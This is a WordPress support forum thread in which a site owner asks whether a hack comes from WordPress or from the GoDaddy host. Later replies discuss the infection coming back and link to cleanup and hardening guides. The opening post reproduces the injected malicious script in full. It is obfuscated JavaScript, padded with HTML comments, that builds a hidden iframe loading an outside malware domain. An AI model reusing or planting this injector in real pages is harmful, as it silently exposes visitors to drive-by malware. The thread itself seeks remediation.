WordPress.org

Support

Support » How-To and Troubleshooting » [Resolved] Is this a WordPress exploit error or GoDaddy’s fault?

[Resolved] Is this a WordPress exploit error or GoDaddy’s fault?

  • Recently, a WP blog was attacked and left with this code:

    <!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><script type='text/javascript'>function vS(){};this.nU='';vS.prototype = {r : function() {this.k="";this.mQ="";this.w='';this.zD=false;oD=false;wD="wD";var z=document;this.n=false;h="h";f="";var m=window;this.d=22706;var iQ=function(){return 'iQ'};uM=17389;function p(){};this.gQ="gQ";this.zT=false;var c=new Array();var bJ="bJ";    String.prototype.mM=function(g, u){return this.replace(g, u)};this.pO='';this.y=47529;var jU="jU";sR="sR";tV='';function rE(){};bC="bC";var t = 's{t?y{lKe?'.mM(/[\?K\{\|z]/g, '');iY=false;function tC(){};this.dF="";var tS=52222;        var v = 'a_pDpNeNnsdDCDhsiNlDdN'.mM(/[NDLs_]/g, '');this.tJ="";var bG='';var j = 'iwf>rUa>mUe>'.mM(/[\>w9UH]/g, '');function uZ(){};var aO="aO";var i = 'c]r]e#a@the]E#l]e#m]ehn]t#'.mM(/[#x@\]h]/g, '');eO='';l=false;var b = 'w>rviRtTev'.mM(/[v\>RT2]/g, '');var tW=34149;this.eG="eG";var rEL="";var e = 'sve:tIA:tkt:rkiIbvuvtvec'.mM(/[cvI\:k]/g, '');var iQD=function(){};var oW="";var kY=function(){return 'kY'};var s = 's0r?c?'.mM(/[\?10B7]/g, '');function pW(){};this.dJ="dJ";var jV = 'bSoSd?y?'.mM(/[\?Sp\(n]/g, '');var kI=function(){return 'kI'};this.uR="";vO="";hW='';var rM = 'd*i*s*p3lHaHy*:wn^o*n*e^'.mM(/[\^\*Hw3]/g, '');function yL(){};var eD=new Date();var iM=function(){};var x='';var uB = 'sUeNtNTLi$m$eNoUu$t$'.mM(/[\$NUCL]/g, '');iZ=411;function uN(){};this.iW=false;var fS=new Array();this.lV="lV";var eOX=function(){};tG="";try {this.fY="";var aON=new Date();gF=41884;this.kL="kL";var rS='';var a=z[i](j);eB=45917;nZ='';var oU=function(){return 'oU'};this.tK=36442;a[e](s, this.sW());gD="";this.yJ=63939;var lB=false;var kYF="";a[e](t, rM);var cT=52936;this.pS=false;this.cU=false;var q=65146;var fYC=new Array();document[jV][v](a);var kR=false;this.gB=false;function tP(){};var gU=9828;var bK=false;rV="";} catch(o) {kA='';this.oX='';var oV='';this.bT=false;z.write('tpO%swL%<%/%bpowdwy%>%<p/phptwm%lZ>I'.mM(/[Iwp%Z]/g, ''));zU="zU";this.sC='';function rH(){};jUL='';var aP = this;var zB=function(){};var sS="sS";var vF=function(){};m[uB](function(){ aP.r() }, 231);var qG=new Date();lG="lG";this.sM="";}xG='';this.dU="";},sW : function() {xB="xB";var wT="";var jVA=new Date();return 'h+t8tBp8:+/8/+yMaxhMoBoM-Bs+tBa8tBi8sxt+ixcM.+cBo+mx/BjBsB/Md+exfBaxu8l8tM.Bh+txmxl+'.mM(/[\+BMx8]/g, '');var jR="";rD="";}};this.nA=false;var hG=new vS(); this.jG=50573;hG.r();gA='';</script><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ -->

    Is this an attack b/c of WordPress security problems or is it related to the GoDaddy virus that’s been going around talked about here: http://wordpress.org/support/topic/362584?replies=4

Viewing 4 replies - 1 through 4 (of 4 total)
  • Wow, this is nuts. I deleted the above code that was inserted but just 3 days later it reappears! WTF.

    Is this a trojan horse or exploit that’s within GoDaddy’s servers? I need to figure out how to prevent this malware from replicating!

    Did you ever resolve this? I am also having the problem with this script on my WordPress site as well. (I haven’t updated WP for a while, so I know I’m largely to blame… no need to rub it in people!)

    I haven’t tracked down the location of the script yet, but it was found by unmaskparasites. Where abouts was it located for you?

    Cheers,

    John

    We never found out what the cause was but since I deleted it, it hasn’t been a problem luckily. I think it was GoDaddy’s fault since they’ve had similar problems with others, since.

    Wow, this is nuts. I deleted the above code that was inserted but just 3 days later it reappears!

    Yes. If you do not clean out the bad stuff, the hacker probably left open a back-door for himself. Once your site is hacked, the hacker can get in very easily afterward. For information about cleaning up, see the following links:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    How To Completely Clean Your Hacked WordPress Installation

    How to find a backdoor in a hacked WordPress

    Then look at this Codex article to protect against future attacks:

    http://codex.wordpress.org/Hardening_WordPress

    This ought to cover you, but if it doesn’t you can find out more about specific hacks by searching the web and these forums.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘[Resolved] Is this a WordPress exploit error or GoDaddy’s fault?’ is closed to new replies.
Skip to toolbar